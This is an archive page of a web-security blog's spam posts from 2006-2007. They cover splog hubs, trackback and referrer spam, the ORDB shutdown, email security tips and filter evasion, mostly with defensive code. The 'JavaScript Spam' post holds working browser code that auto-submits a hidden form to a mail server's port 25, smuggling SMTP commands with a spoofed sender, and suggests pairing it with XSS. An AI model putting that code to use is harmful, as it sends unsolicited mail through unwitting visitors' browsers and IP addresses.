web application security lab

Archive for the 'spam' Category

Splog Hubs

Wednesday, March 28th, 2007

The $100/month charge for the SEO Blackhat Forums is well worth it if you are either into getting ill-gotten gains or into combating those gains. Every time I log in there I find out more interesting things that spammers and blackhat types are doing to make money. There’s a thread on there discussing splog hubs. For those of you who aren’t aware of what this is, let me enlighten you (the picture, ripped from said splogger, is not reproduced here):

On the right you have your unique-content blogs, like mine or the dozens of other ones you probably visit, with no malicious or spam content on them. In the middle is a spam hub. The spammers pull all the content from the original blogs and aggregate it on that centralized hub. They use IP filtering so that the splog servers on the left can fetch from the hub but no one else can. That way, even if the hub’s address leaks (say the splogger browses his own hub and inadvertently clicks a link back to the original site, sending a referrer), the owner of the original site who follows that referrer cannot see their own content on the hub.

In this way the sploggers are scraping their own hub rather than the original sites directly. The point is that when the owner of a site sees their content on the splogs, even if they manage to get those taken down, they haven’t touched the infrastructure that is used to scrape the content. Interesting. I have my own fun ways to combat this sort of thing (along the lines of how I ruined another splogger’s day). However, this is an interesting take (a splog by proxy) that I hadn’t heard of before in this form.

JavaScript Spam

Sunday, March 25th, 2007

Every once in a while I hear something that really gets my imagination going. A few weeks ago when Samy and I were having lunch, he told me about a way to send email through a browser using a form and an automatic form submission using JavaScript. While not new (there is an old, obscure paper about this dating back to 2001), it’s definitely not well known. Especially in this day and age, where JavaScript is coming under more scrutiny because of its malicious power, this could prove to be a really nasty thing in a spammer’s arsenal.

The only obstacle in a spammer’s way is knowing which mail servers will tolerate the garbage that arrives ahead of the SMTP commands (the HTTP request line, headers and multipart boundary all show up at the mail server as unrecognized commands) and keep the session open long enough to read the real commands out of the form body. Thus far it looks like sendmail works, but I haven’t had luck with Exchange or qmail. Here’s some sample code:

// Hidden frame to receive the POST response, so the page itself stays put.
document.write('<iframe name="A" style="display:none"></iframe>');
var server = 'mail.server.com';
// Post straight to port 25. The HTTP request line and headers reach the mail
// server as unrecognized SMTP commands; the textarea body carries the real ones.
document.write('<form name="B" target="A" method="post" action="http://' + server + ':25/" enctype="multipart/form-data">');
document.write('<textarea name="C"></textarea></form>');
// The browser converts the textarea's newlines to CRLF on submission, which is what SMTP wants.
var s = 'HELO test\n';
s += 'EHLO test\n';
s += 'MAIL FROM:<test@hotmail.com>\n';
s += 'RCPT TO:<user@domain.com>\n';
s += 'DATA\n';
s += 'From: test@test.com\n';
s += 'To: test@test.com\n';
s += 'Subject: heh!\n';
s += 'testing 123\n\n';
s += '.\n\nQUIT\n\n';
document.B.C.value = s;
document.B.submit();
// Note: current Firefox and Chrome refuse to connect to port 25 from a page at all,
// so this needs an older or unrestricted browser to reach the mail server.

Combine this with XSS, and with knowing the email address of the user visiting the page, and you can create ultra-targeted spam that is sent by that user, from that user’s IP address. Why bother burning through your own IP space if you can get someone else to use theirs? Pretty ugly! Your mileage may vary in the calls themselves. I’d be interested to hear other people’s test results.
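To see what the mail server actually receives, here is an added example in Python (not code from the original post, and not Samy’s). It hand-builds the multipart POST a browser would emit for the form above (the boundary string and the host name are made up) and feeds the bytes through a toy SMTP state machine. With no error limit the session survives the HTTP junk, which is the behaviour the post reports for sendmail; with a hard error limit, as Postfix’s smtpd_hard_error_limit imposes, the connection is dropped before HELO is ever reached.

```python
"""Form-to-port-25 mail injection, seen from the SMTP side.

Added example, not the original post's code. Builds the raw HTTP request a
browser would send for the form/textarea above (the boundary string is a
made-up value) and replays it through a toy SMTP server to show why
tolerant and strict servers differ.
"""
from typing import List, Optional, Tuple

BOUNDARY = "----FormBoundaryDEMO"  # hypothetical; real browsers pick a random one

# The SMTP transaction the page's JavaScript places in the textarea.
SMTP_SCRIPT = (
    "HELO test\nEHLO test\n"
    "MAIL FROM:<test@hotmail.com>\nRCPT TO:<user@domain.com>\n"
    "DATA\nFrom: test@test.com\nTo: test@test.com\nSubject: heh!\n"
    "testing 123\n\n.\n\nQUIT\n\n"
)


def build_browser_post(host: str, textarea_value: str) -> bytes:
    """Approximate the multipart/form-data POST the browser emits.

    Browsers normalise textarea newlines to CRLF on submission, so the
    SMTP commands arrive with the line endings SMTP expects.
    """
    body_lines = [
        f"--{BOUNDARY}",
        'Content-Disposition: form-data; name="C"',
        "",
        *textarea_value.split("\n"),
        f"--{BOUNDARY}--",
    ]
    body = "\r\n".join(body_lines) + "\r\n"
    headers = [
        "POST / HTTP/1.1",
        f"Host: {host}:25",
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
        f"Content-Length: {len(body)}",
        "",
    ]
    return ("\r\n".join(headers) + "\r\n" + body).encode("latin-1")


def smtp_session(raw: bytes, hard_error_limit: Optional[int] = None) -> Tuple[bool, int, List[str]]:
    """Toy SMTP server: treat every CRLF-terminated line as a command.

    Returns (message_accepted, unrecognized_command_count, recipients).
    hard_error_limit=None models a server that answers "500 unrecognized
    command" indefinitely; an integer models one that drops the connection
    once that many errors have occurred.
    """
    errors, rcpts, sender, accepted = 0, [], None, False
    in_data = False
    for line in raw.decode("latin-1").split("\r\n"):
        if in_data:
            if line == ".":          # end of message body
                accepted = sender is not None and bool(rcpts)
                in_data = False
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            pass
        elif verb == "MAIL" and arg.upper().startswith("FROM:"):
            sender = arg[5:].strip()
        elif verb == "RCPT" and arg.upper().startswith("TO:"):
            rcpts.append(arg[3:].strip())
        elif verb == "DATA" and sender is not None and rcpts:
            in_data = True
        elif verb == "QUIT":
            break
        else:
            # The HTTP request line, headers, blank lines and multipart
            # boundaries all land here: "500 command unrecognized".
            errors += 1
            if hard_error_limit is not None and errors >= hard_error_limit:
                break
    return accepted, errors, rcpts


if __name__ == "__main__":
    raw = build_browser_post("mail.server.com", SMTP_SCRIPT)
    print(smtp_session(raw))                      # tolerant server: accepted
    print(smtp_session(raw, hard_error_limit=5))  # strict server: dropped early
```

The flip side for defenders: a session whose first "command" is POST / HTTP/1.1 is unmistakable in mail logs, and a low hard error limit kills it before the RCPT ever arrives.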

Tracking Back The Trackback Spam

Wednesday, March 21st, 2007

I got 290ish trackback spams last night, and that’s after quite a few anti-spam filters. For some reason spammers think I’ll approve their spam through sheer volume. Well, they couldn’t be more wrong. In fact, I’ve been thinking of interesting ways to detect them. For those of you who don’t run blogs, trackback spam is when robots pretend to be other blogs linking to my site. My site picks up the POST request from the robot, which tells it a few things: the link to the site, a title and some sample text. Trackback spam is difficult to stop because even a legitimate trackback doesn’t look like normal browser traffic (it’s a machine-to-machine POST), so the usual bot heuristics don’t apply. So today I came up with a few semi-clever tactics to end the madness.

The first is the IP address. This is one thing the robot cannot fake: the POST rides on a completed TCP connection, so the source address is real. A legitimate trackback normally comes from the web server hosting the blog that is linking to me. If it doesn’t, that’s a huge signal that it’s a robot. So what if I connect back to the same IP address on port 80 and look for a web server? If I don’t see one, I can be 99% sure it’s fake traffic. The only way that wouldn’t be true is if the site just temporarily went down or the server is on another port. Either way, do I really care?

Next is the IP address of the link. The hostname in the submitted link should resolve to the same IP address the trackback came from. Why would a site be sending a trackback on behalf of some other website? That makes no sense, and therefore again it’s 99% spam. The only way the spammers could get around this is to temporarily point the DNS entry for the link at the sending server, but even then they’d have to be running a web server on that IP address. In this way you can quickly exhaust the number of hosts they can spam from, because they must run a web server on each one to get it to work (which they do in less than 1% of the cases I’ve looked at thus far), and they must also link to that same server. That greatly increases the work a spammer has to do just to get a link to show up in my moderation queue, and I can simply ban that IP address going forward, since I know it is truly the same IP as the spam site that I don’t care to see anyway.

It’ll be fun writing the software. They spammed the wrong guy 290 times!

Referral Spam Tactics

Tuesday, March 13th, 2007

This isn’t truly a new referral spam tactic, but it it’s probably not well known, especially amongst people who don’t run their own websites. I got an email from someone who thought that somehow some porn site had inadvertently linked to them and started to send them tons of traffic. In fact it was quite a few sites that they had thought were sending them traffic. He thought someone had mis-configured something and it was working to his advantage. As a result he put up a link back to their sites, thinking he could get more traffic. It turns out he was playing completely into their hands. He had been social engineered.

The URLs are pretty sneaky: http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=pr0nsitename (obviously the string itself has been changed). So I searched for pr0nsitename and found that dozens of hits were coming in from msn and live.com. Each of the sites was cloaking and getting itself indexed very high. When you actually went to that msn or live.com page you could see the URL linking back to me (something like this): www.pr0nsite.com/cgi-bin/blah.cgi?cmd=out&url=http://sla.ckers.org/forum/somepage.php. On inspection it’s a simple redirector, there to detect whether I do, in fact, start sending them traffic by posting a link pointing to them.

After some more digging I found that if you take any one of the IPs, it shows up coming from more than one different porn search. Hmm… what are the chances that a single IP address found its way to my site through two completely different redirects from porn sites? Uhm… I’ll give you a hint: it’s zero. The point is you cannot trust referring URLs. I barely look at them anymore, except to diagnose issues. You should not trust referring URLs from porn sites, you should definitely not click on them, and you should absolutely, definitely not post them on your site thinking you’ll get more traffic from it. It turns out that every single hit that both he and I got from this particular porn site was robotic. Yup, that’s bad.
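The "one IP, two unrelated redirects" observation turns into a simple log check. Here it is as an added example (not the post author’s tooling): it parses Combined Log Format lines and flags client IPs that arrived via two or more different redirector hosts, where a redirector is any referrer carrying a url= target (the cmd=out&url=... pattern above) or a search results q= parameter. The log lines are constructed; the hostnames in them are the ones quoted in the post plus documentation addresses.

```python
"""Referrer-spam spotting over web server logs. Added example, not the
post author's code. SAMPLE_LOG is constructed, not real traffic.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, Optional, Set
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = [
    '198.51.100.23 - - [13/Mar/2007:10:01:02 -0600] "GET /forum/somepage.php HTTP/1.1" 200 5120 '
    '"http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=pr0nsitename" "Mozilla/4.0"',
    '198.51.100.23 - - [13/Mar/2007:10:03:41 -0600] "GET /forum/somepage.php HTTP/1.1" 200 5120 '
    '"http://www.pr0nsite.com/cgi-bin/blah.cgi?cmd=out&url=http://sla.ckers.org/forum/somepage.php" "Mozilla/4.0"',
    '203.0.113.8 - - [13/Mar/2007:10:05:00 -0600] "GET /forum/somepage.php HTTP/1.1" 200 5120 '
    '"http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=otherp0rnsite" "Mozilla/5.0"',
    '203.0.113.8 - - [13/Mar/2007:10:05:03 -0600] "GET /style.css HTTP/1.1" 200 800 '
    '"http://sla.ckers.org/forum/somepage.php" "Mozilla/5.0"',
    '192.0.2.77 - - [13/Mar/2007:10:07:19 -0600] "GET /forum/somepage.php HTTP/1.1" 200 5120 '
    '"http://www.google.com/search?q=sla.ckers" "Mozilla/5.0"',
]


def redirect_target(referer: str) -> Optional[str]:
    """The url= (redirector) or q= (search results) payload the referrer
    carries, or None if the referrer is an ordinary page."""
    query = parse_qs(urlsplit(referer).query)
    for key in ("url", "q"):
        if key in query:
            return query[key][0]
    return None


def find_referrer_bots(log_lines: Iterable[str], min_hosts: int = 2) -> Dict[str, Set[str]]:
    """Map client IP -> distinct redirector hosts it claimed to arrive from,
    keeping only IPs with at least min_hosts of them. A human who searched
    twice still has one host; a bot cycling through fake referrers has many."""
    hosts_by_ip: Dict[str, Set[str]] = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ref = m["referer"]
        if ref in ("", "-") or redirect_target(ref) is None:
            continue
        hosts_by_ip[m["ip"]].add(urlsplit(ref).hostname)
    return {ip: hosts for ip, hosts in hosts_by_ip.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for ip, hosts in find_referrer_bots(SAMPLE_LOG).items():
        print(ip, "arrived via", sorted(hosts))
```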

Open Relay Database Is Shutting Down

Thursday, December 21st, 2006

This link probably won’t work in another week or so, but according to their website the open relay database is shutting down. This is an interesting turn of events. Their reasoning is that the people running it have found other things to do and that the spammers have changed tactics. There may be a logical fallacy here; let’s think about this for a second.

First of all, one of the reasons spammers changed tactics was that open relays were no longer as effective as before. That was due in large part to companies landing on blacklists because they had open relays they didn’t even know about. So the problem was sort of fixing itself, leaving the spammers with fewer and fewer relays. That did, in fact, make the spammers change tactics. That doesn’t mean the problem will stay fixed, though. Let’s think about how companies use ORDB: when a mail comes in, the receiving server takes the connecting client’s IP address, reverses the octets and prepends them to relays.ordb.org (so 192.0.2.1 is looked up as 1.2.0.192.relays.ordb.org), and does a DNS lookup on that name. If it comes back positive, the host is a known open relay and the mail shouldn’t be accepted.

Now that the open relay database is gone, there are a few funky things that could happen. 1) You could see a delay in processing time on a lot of mail servers that rely on the ORDB domain being up to check their blacklist. Since the server is no longer up, and the DNS entries are going away, every lookup has to time out before the mail gets processed. Postmasters, it’s time to upgrade. 2) You may start seeing a sharp rise in the number of open relays out in the world, allowing the spammers to move back to their old tactics. 3) The ORDB guys “recommend a combination involving greylisting and content-based analysis (such as the dspam project, bmf or Spam Assassin).” Until that happens you may also see an increase in spam while the postmasters upgrade their systems.
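The lookup itself, and the failure mode from point 1, as an added example (not ORDB’s or any MTA’s code): the query name is built by reversing the octets, and the result is treated as three-way, listed, clean, or unknown because the zone timed out. A server that keeps querying a retired zone pays that timeout on every message, which is why the check has to fail open and why the postmaster has to remove the list. The zone name relays.example.test and the fake resolvers are constructed.

```python
"""DNSBL query as ORDB clients do it, with a three-way outcome.
Added example, not ORDB's code. FAKE_ZONE and the fake resolvers below
are constructed stand-ins for a live and a dead list.
"""
import socket
from typing import Callable, Optional


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Octets reversed and prepended to the zone: 192.0.2.1 -> 1.2.0.192.<zone>."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip}")
    return ".".join(reversed(octets)) + "." + zone


class ZoneTimeout(Exception):
    """The list's name servers did not answer (dead or retired zone)."""


def dnsbl_check(client_ip: str, zone: str,
                resolve: Callable[[str], Optional[str]]) -> str:
    """Returns 'listed', 'clean' or 'unknown'.

    resolve(name) returns the A record as a string, None for NXDOMAIN, or
    raises ZoneTimeout. The check is made on the *connecting* client's IP
    at SMTP time, before the message is accepted.
    """
    name = dnsbl_query_name(client_ip, zone)
    try:
        answer = resolve(name)
    except ZoneTimeout:
        return "unknown"        # fail open: never reject mail on a dead list
    return "listed" if answer is not None else "clean"


def system_resolve(name: str) -> Optional[str]:
    """Live resolver using the OS stub resolver (not used by the demo)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror as e:
        if e.errno == socket.EAI_AGAIN:   # temporary failure: typically a timeout
            raise ZoneTimeout(name) from e
        return None


# Constructed fixtures. Lists conventionally answer with a 127.0.0.x address.
FAKE_ZONE = {"1.2.0.192.relays.example.test": "127.0.0.2"}


def fake_live_resolve(name: str) -> Optional[str]:
    return FAKE_ZONE.get(name)


def fake_dead_resolve(name: str) -> Optional[str]:
    raise ZoneTimeout(name)


if __name__ == "__main__":
    print(dnsbl_check("192.0.2.1", "relays.example.test", fake_live_resolve))  # listed
    print(dnsbl_check("192.0.2.2", "relays.example.test", fake_live_resolve))  # clean
    print(dnsbl_check("192.0.2.1", "relays.example.test", fake_dead_resolve))  # unknown
```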

Yes, ORDB was sort of outdated technology, but that doesn’t mean it wasn’t needed. Only time will tell what the full impact will be.

99 Email Security Tips

Sunday, November 26th, 2006

I ran across this article today on 99 ways to secure your email. Largely it’s email etiquette and efficiency fluff, and there are really only a small handful of actual ways to secure your email in it (numbers 78-99). There are a few tips I’d give people that are definitely not mentioned on their list. Here are a few from my personal list:

1) Turn off preview panes. When you click an email and it shows up in the preview pane, the remote images are rendered and the tracking images spammers use to verify their lists fire. That tells them a) you are a real user and b) you are a user who reads spam. Having email open automatically also increases the likelihood of an email-client exploit running without you doing anything. None of that is good, so turn off the preview pane.

2) Don’t put email addresses or sensitive corporate information into out of office emails. If you are out of office, just tell them the name of who to get in contact with. If they know anything about your company they’ll know how to get in touch with the front desk and use the person’s name to get in touch with them. A number of times people have set out of office messages with stuff like, “If you need information on super secret project x please contact….” Firstly, that’s bad if it’s someone who doesn’t really know you (sales people, etc…) secondly, if it contains email addresses those too can be scraped by the spammers who watch the return addresses for bounces.

3) Use DomainKeys, SPF (Sender Policy Framework) records or other tools to reduce spoofing. If you want to let people verify that email from any user on your domain is legitimately from you, without causing them too much grief, install DomainKeys or publish SPF records to reduce the likelihood of people successfully spoofing your email. PGP signing is great, but it only covers the one person using it, unlike DomainKeys or SPF, which cover the whole domain.

4) Unlike what the article says, do NOT use Yahoo or Hotmail as methods to send anonymous emails. Both add headers (such as X-Originating-IP) that show the recipient the IP address you sent from. Use something like Hushmail instead.

5) Create custom email addresses for specific sites. I’ve seen a number of people who have begun building out vanity email addresses based on the specific site they are visiting, e.g. ha.ckers.org@mysite.com, so that when spam arrives at one of them you know exactly which site leaked or sold it.

6) Validate users who are allowed to send email to you. This is an ugly one, but by only accepting mail from people you have explicitly authorized, you can significantly reduce unsolicited email. You had better not use one of these accounts for anything you want electronic receipts for, but for personal accounts it’s a pretty decent solution.

7) Use a fake or modified name on each site you visit. If my name is “John Smith”, signing up as something like “John Petsmart Smith” lets me know that Petsmart sold my information when spam or phishing emails addressed to that name show up in the future.

Anyway, there are dozens of ways to secure your email. I’m sure everyone can contribute to this list. It’s a huge topic, and they really only scratched the surface.

Email as Half Factor Authentication

Thursday, November 9th, 2006

Over the last several years I’ve noticed a disturbing trend in web application security: the use of email as a form of authentication. Once upon a time web application security was a very obscure concept, and as such it made sense to rely on a simple (although largely inaccurate) assumption, which is that users have complete control over their email address. Let’s think about this for a second. How are emails being used today?

According to MAAWG between 80-85% of all email is abusive. Okay, so the user is inundated with spam, viruses, trojans, phishing emails and other scams and that represents the vast majority of email they will receive. That means a pathetic 15-20% of email is actually “good” or non-abusive.

I don’t have any real data to back up how many email accounts worldwide have been compromised but I do have statistics on how many of the top two web mail servers have been compromised with some form of attack. Both Hotmail and Yahoo mail have had issues, but let’s not forget Gmail too. At one point I met with an AOL business person and they told me that the number of account takeovers they had were “in the percentage” range. He was unwilling to tell me how many percent, but even if it’s 1% of users that represents over 500,000 accounts.

Okay, so email is both insecure and highly targeted for malicious activity. Now let’s look at how companies are using it. Many companies still require that users use an email address as the primary username for logging in to their accounts, and they reference the accounts that way. That makes it extremely easy to identify users, and potentially difficult to guess, since there are billions of email addresses out there. However (and here’s the fatal flaw), the same sites let you back in through a forgot-password function that relies on nothing more than that email address.

So an attacker who gets access to your email (given the flaws in the webmail systems) can look through it (since they have access to it), find the websites you have kept information on, use the forgot-password function (which generally asks for nothing more than an email address), and now they have access to your account on each of those sites.

Websites use email as a form of half-factor authentication. It isn’t something you have, and it is something you know only in the sense that the mailbox is not normally out of your control. In this way it is very easy to gain access to websites given access to an email account. People don’t generally think of their webmail as a critical asset. It’s where they sign up for random websites, since they don’t want to use their work account while shopping for lingerie. But by putting so much faith in the webmail application they have now put at risk whatever can be done on any website they have an account with. A disturbing trend, to be sure.

Spam-me-not Obfuscation

Monday, October 23rd, 2006

I saw an interesting link today that reminded me a lot of the XSS Calculator. I wonder why. No, really, I actually don’t wonder why: it’s practically the same thing. Spam-me-not is designed to let people use mailto: links just as they do today while obfuscating the address with a mix of HTML character entities and hex escapes. Cool in concept, but pretty trivial to beat. The cost to modern-day robots of doing the backwards conversions required to get the real text is next to nothing.
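The "backwards conversion" is two standard-library calls. The following is an added example (not spam-me-not’s code; the sample markup is constructed to mix decimal entities, hex entities and percent-escapes, and is not spam-me-not’s actual output). It does what a harvesting bot does: find every href, decode it, and keep the ones that turn out to be mailto: links.

```python
"""Decoding an entity/hex-obfuscated mailto: link, the way a harvester would.
Added example, not spam-me-not's code. SAMPLE_HTML is constructed.
"""
import html
import re
from typing import List
from urllib.parse import unquote

# Constructed: "mailto:user@example.com" scrambled three different ways at once.
SAMPLE_HTML = (
    '<p>Contact: <a href="&#109;&#x61;&#105;lto:%75s&#101;r&#64;exa%6dple&#46;com">'
    '&#117;&#x73;&#101;r&#64;example.com</a></p>'
)

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def deobfuscate(value: str) -> str:
    """Undo HTML entities (decimal &#NNN; and hex &#xHH;), then percent-escapes.

    Order matters: an entity can itself encode a '%' that only becomes a
    percent-escape after the first pass. html.unescape and unquote are the
    whole 'decoder' the post says takes 10 seconds to write.
    """
    return unquote(html.unescape(value))


def harvest_mailto(page: str) -> List[str]:
    """Every address a bot would pull out of the page's mailto: links."""
    found = []
    for raw in HREF_RE.findall(page):
        decoded = deobfuscate(raw)
        if decoded.lower().startswith("mailto:"):
            # drop the scheme and any ?subject=... suffix
            found.append(decoded[len("mailto:"):].split("?", 1)[0])
    return found


if __name__ == "__main__":
    print(harvest_mailto(SAMPLE_HTML))   # the obfuscation buys nothing
```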

I think the value in this is fairly limited. Spam is sort of a way of life these days. Email is really taking a back seat to other forms of internet communication like instant messaging, and overseas you’re beginning to see a lot of voice over IP traffic. It just makes more sense. Email has been around for 15 or 20 years now, and the spammers are always ahead of the anti-spammers. That’s not entirely true, though. I’ve got a few accounts that get thousands of spam emails a day, and I see none of it. It’s pretty remarkable, actually.

This form of obfuscation that spam-me-not provides is probably effective against the lowest common denominator of spam bots. And as more people use this form of obfuscation, bot developers will spend the 10 seconds necessary to write the code to decode it (they don’t even have to write it from scratch, since it’s already out there). All of this reminds me of the DMCA problem. If you release something that has to be decoded at some point, there is nothing you can do to stop the decoded information from being logged elsewhere. It’s the nature of software. Oh well, maybe some people will find some use for spam-me-not, while the rest use email forms.

Referrer Spam Plus CSS History Equals Effective

Sunday, October 15th, 2006

It occurred to me today as I looked over the referrer spam in my logs that it is particularly ineffective these days. For those of you who aren’t webmasters or don’t look at your logs very often, referrer spam is when spiders connect to your website and send a fake Referer header (HTTP_REFERER in your logs) that incorrectly tells you that someone is linking to you. Most of the time it’s pretty ineffective; however, with Jeremiah’s CSS history hack (reading back which links the browser styles as :visited; browsers have since restricted what :visited styling a page can observe), it might be far more useful.

It stands to reason that if I’m the administrator of a website, I’ve probably been to its homepage at some point in my last browser session. Of course I can turn off that cross-domain leakage with Safe History, but no one uses that, so the attack is pretty effective. If you know there is a single choke point (like a login page) that the administrator must use, that’s even better, as they will have to go through it to view their logs.

By verifying that the person who followed the spammed referrer URL is the same person who has been viewing the site in the logs (their browser history says so), the spammer can be sure that the webmaster views their logs and does something with them, which is what makes the spam effective at generating traffic. This is similar to how email spammers put tracking links in their email to measure open rates for particular messages (that’s why you should never auto-render images, and you should never use the preview pane, as that opens them automatically). Anyway, new attacks using this old hack are always interesting to me.

XSS Keyword Used To Defeat Bayesian Spam Filters

Wednesday, October 11th, 2006

I was pretty amazed when I read this, but it is starting to make more and more sense the more I think about it: “geek speak” is being used to defeat Bayesian spam filters. According to MessageLabs (who I happen to think is one of the best managed anti-spam services out there), using simple keywords can help reduce the likelihood of something being caught as spam. And get this: one of the keywords mentioned is “XSS” of all things!

Like I said, it sorta makes sense once I started thinking about it. One of the most bizarre things that happened to me was the time I was writing a fairly in-depth paper on the large-scale effects of 419 advance fee fraud. While I was writing the fairly in-depth technical explanation, I sent it to a few trusted parties whose input I wanted. It never got there. It was impossible to get it to them, because it kept getting marked as spam! I had to do all sorts of crazy things to disguise it in transit but still make it show up okay on the other end (basically I had to defeat the spam engine itself). Talk about a hassle!

Certain emails have certain characteristics. An email about cooking has the words “pots” and “spices”. An email about XSS has crazy filter evasion and HTML markup galore. The heuristics of an email about XSS look an awful lot like someone trying to evade filters, and for the spam engine not to flag it as a false positive it has to tune itself, looking for particular words that whitelist an email that otherwise looks obfuscated or has a very high (or, alternately, very low) level of entropy.

Makes perfect sense! I guess the spam engines need some tuning now, as XSS isn’t a marker of something particularly good or particularly bad, as it turns out. I’ve seen the exact opposite thing happen, where services have denied requests containing the word “XSS”. Talk about poor design: all you have to do is not use that word and you’re back up and running. XSS strikes again, in the most unlikely place!
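To show the mechanism rather than just assert it, here is an added example (not MessageLabs’ engine or anyone else’s filter): a small naive Bayes filter trained on a constructed corpus in which "xss" and its neighbours occur only in legitimate security mail, scoring a spam message with and without geek-speak tokens bolted on. A single hammy token only dents the score; stacking several drags an obvious spam below a 0.9 threshold, which is exactly the tuning artefact the post describes.

```python
"""Why a 'good' keyword moves a Bayesian spam score.
Added example, not MessageLabs' code. Both corpora are constructed.
"""
import math
import re
from collections import Counter
from typing import Set


def tokenize(text: str) -> Set[str]:
    return set(re.findall(r"[a-z0-9]+", text.lower()))


class BayesFilter:
    """Document-frequency naive Bayes with Laplace smoothing."""

    def __init__(self) -> None:
        self.spam_df: Counter = Counter()   # number of spam docs containing token
        self.ham_df: Counter = Counter()    # number of ham docs containing token
        self.n_spam = 0
        self.n_ham = 0

    def train(self, text: str, is_spam: bool) -> None:
        (self.spam_df if is_spam else self.ham_df).update(tokenize(text))
        if is_spam:
            self.n_spam += 1
        else:
            self.n_ham += 1

    def token_prob(self, tok: str) -> float:
        """P(spam | token). A token seen only in ham drives this toward 0,
        which is what 'whitelisting' a word amounts to inside the model."""
        p_s = (self.spam_df[tok] + 1) / (self.n_spam + 2)
        p_h = (self.ham_df[tok] + 1) / (self.n_ham + 2)
        return p_s / (p_s + p_h)

    def score(self, text: str) -> float:
        """Combined spam probability over tokens the filter has seen before
        (never-seen tokens are neutral and skipped). Log space avoids underflow."""
        log_p = log_q = 0.0
        for tok in tokenize(text):
            if tok not in self.spam_df and tok not in self.ham_df:
                continue
            p = self.token_prob(tok)
            log_p += math.log(p)
            log_q += math.log(1 - p)
        return 1.0 / (1.0 + math.exp(log_q - log_p))


# Constructed training data: "xss" never appears in spam.
SPAM_CORPUS = ["cheap viagra click here",
               "click here for cheap pills",
               "buy viagra now",
               "unsubscribe here"]
HAM_CORPUS = ["xss filter evasion cheatsheet",
              "new xss vector",
              "xss in the login form",
              "xss payload with script alert"]


def trained_filter() -> BayesFilter:
    f = BayesFilter()
    for text in SPAM_CORPUS:
        f.train(text, True)
    for text in HAM_CORPUS:
        f.train(text, False)
    return f


if __name__ == "__main__":
    f = trained_filter()
    for msg in ("cheap viagra click here",
                "cheap viagra click here xss",
                "cheap viagra click here xss filter evasion"):
        print(f"{f.score(msg):.3f}  {msg}")
```

With these counts the plain spam scores about 0.99, adding "xss" drops it to about 0.96, and adding "xss filter evasion" drops it to about 0.84. The fix is the same as for any other token the spammers start abusing: keep training on the spam that carries it, so the token’s spam probability climbs back toward neutral.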